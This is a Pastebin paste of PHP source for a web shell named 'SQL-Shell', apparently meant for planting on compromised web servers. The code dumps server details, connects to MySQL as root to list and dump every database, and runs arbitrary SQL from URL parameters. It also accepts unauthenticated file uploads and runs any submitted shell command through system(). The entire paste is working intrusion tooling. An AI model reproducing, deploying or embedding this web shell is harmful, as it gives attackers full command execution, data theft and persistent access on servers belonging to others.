Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <head>
- <title>SQL-Shell : rummykhan </title>
- <style type="text/css">
- .main{
- color:white;
- background-color: black;
- background-image: url(http://s29.postimg.org/isfa5pn8n/Anonymous_1680x1050.jpg);
- }
- .heading{
- color:green;
- font-weight: bold;
- }
- .pad{
- padding: 5px;
- }
- </style>
- </head>
- <body class="main">
- <?php echo '<span class="heading">Server : </span>'.php_uname(); ?>
- <br>
- <br>
- <center>
- <form method="GET" action="">
- <table>
- <tr>
- <td><span class="heading">Query :</span></td>
- <td><textarea name="usrquery" rows="5" cols="40" ><?php if(isset($_GET['usrquery'])){echo $_GET['usrquery'];} ?></textarea></td>
- </tr>
- <tr>
- <td></td>
- <td><input type="submit" name="runquery" value="Submit"></td>
- </tr>
- </table>
- </form>
- <?php
- error_reporting(0);
- function querydb($query){
- $counter = 0;
- $result = mysql_query($query) or die(mysql_error());
- echo '<table border="1" width="35%">';
- while($row = mysql_fetch_array($result)){
- $counter++;
- echo '<tr>';
- echo '<td class="pad">'.$counter.'</td>';
- for ($i=0; $i < count($row); $i++) {
- if(isset($row[$i])){
- echo '<td class="pad">'.$row[$i].'</td>';
- }
- }
- echo '</tr>';
- }
- $counter=0;
- echo '</table>';
- }
- $user = 'root';
- $pass = '';
- $host = 'localhost';
- $db = $_GET['db'];
- $table = $_GET['tbl'];
- $usrquery = $_GET['usrquery'];
- if(mysql_connect($host,$user,$pass)){
- if(isset($usrquery)){
- mysql_select_db($_COOKIE['db']);
- if (strpos($usrquery, 'INSERT')!==false || strpos($usrquery, 'UPDATE')!==false) {
- if(mysql_query($usrquery)){
- echo 'Query Success<br>';
- }else{
- die(mysql_error());
- }
- }elseif (strpos($usrquery, 'SELECT')!==false || strpos($usrquery, 'select')!==false) {
- echo '<span class="heading">Your Query Output : </span><br>';
- querydb($usrquery);
- }
- }
- if($db==''){
- echo '<span class="heading">DBs : </span><br>';
- querydb('SELECT schema_name FROM information_schema.schemata');
- }else{
- setcookie('db',$db);
- if(isset($table) && isset($db)){
- echo '<span class="heading">Columns : </span><br>';
- querydb("SELECT column_name FROM information_schema.columns WHERE table_schema='".$db."' AND table_name = '".$table."'");
- echo '<span class="heading">Data : </span><br>';
- querydb("SELECT * FROM ".$db.".".$table);
- }else{
- echo '<span class="heading">Tables : </span><br>';
- querydb("SELECT table_name FROM information_schema.tables where table_schema='".$db."'");
- }
- }
- }else{
- die(mysql_error());
- }
- //Uploader Code
- echo '<br>';
- if($_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Upload !!!</b><br><br>"; }}
- ?>
- <html><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file"><input name="_upl" type="submit" id="_upl" value="Upload"></form></html>
- <form method="POST" action="">
- <span class="heading">cmd@b0x : </span>
- <input type="text" name="system" value="<?php if(isset($_POST['system'])){echo $_POST['system'];}?>">
- <input type="submit" name="execute" value="Execute">
- </form>
- <span class="heading">
- <?php
- if(isset($_POST['execute'])){
- if(!empty($_POST['system'])){
- system($_POST['system']);
- }
- }
- ?>
- </span>
- </center>
- </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement